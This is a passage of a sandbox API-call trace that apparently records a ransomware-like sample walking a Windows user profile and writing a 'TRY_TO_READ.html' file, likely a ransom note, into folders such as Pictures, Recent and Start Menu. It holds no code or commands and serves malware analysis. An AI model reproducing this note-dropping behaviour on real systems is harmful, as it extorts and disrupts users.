	[0053.052] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.052] CloseHandle (hObject=0x450) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b998 | out: hHeap=0x540000) returned 1
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9070 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1
	[0053.053] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9138 | out: hHeap=0x540000) returned 1
	[0053.053] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.053] GetLastError () returned 0x0
	[0053.053] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1
	[0053.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9138 | out: hHeap=0x540000) returned 1
	[0053.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.054] GetLastError () returned 0x0
	[0053.054] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4feb680, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb4feb680, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0053.054] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.054] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.054] GetLastError () returned 0x0
	[0053.054] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.061] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.061] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.061] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.061] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.062] CloseHandle (hObject=0x450) returned 1
	[0053.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b9f0 | out: hHeap=0x540000) returned 1
	[0053.062] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1
	[0053.062] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.062] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.062] GetLastError () returned 0x0
	[0053.062] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\printhood\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.063] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.063] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.064] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.064] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.064] CloseHandle (hObject=0x450) returned 1
	[0053.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9158 | out: hHeap=0x540000) returned 1
	[0053.064] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1
	[0053.064] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.064] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.064] GetLastError () returned 0x0
	[0053.064] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.065] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.065] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.066] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.066] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.066] CloseHandle (hObject=0x450) returned 1
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58ba48 | out: hHeap=0x540000) returned 1
	[0053.067] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.067] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.067] GetLastError () returned 0x0
	[0053.067] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.067] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.067] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.068] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.068] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.068] CloseHandle (hObject=0x450) returned 1
	[0053.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d91c0 | out: hHeap=0x540000) returned 1
	[0053.068] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1
	[0053.068] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.068] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.068] GetLastError () returned 0x0
	[0053.069] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.069] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.069] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.070] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.070] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.070] CloseHandle (hObject=0x450) returned 1
	[0053.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58baa0 | out: hHeap=0x540000) returned 1
	[0053.070] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0053.070] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.070] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.070] GetLastError () returned 0x0
	[0053.070] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.072] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0d8 | out: hHeap=0x540000) returned 1
	[0053.072] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.073] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.073] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.073] CloseHandle (hObject=0x450) returned 1
	[0053.074] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.074] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.074] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.074] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58baf8 | out: hHeap=0x540000) returned 1
	[0053.074] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0053.074] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.074] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.074] GetLastError () returned 0x0
	[0053.074] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450
	[0053.075] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589778 | out: hHeap=0x540000) returned 1
	[0053.075] WriteFile (in: hFile=0x450, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.076] WriteFile (in: hFile=0x450, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.076] WriteFile (in: hFile=0x450, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.076] CloseHandle (hObject=0x450) returned 1
	[0053.076] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5896f0 | out: hHeap=0x540000) returned 1
	[0053.076] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596770 | out: hHeap=0x540000) returned 1
	[0053.076] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596760 | out: hHeap=0x540000) returned 1
	[0053.076] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9228 | out: hHeap=0x540000) returned 1
	[0053.076] FindNextFileW (in: hFindFile=0x575820, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0053.076] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.077] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.077] GetLastError () returned 0x0
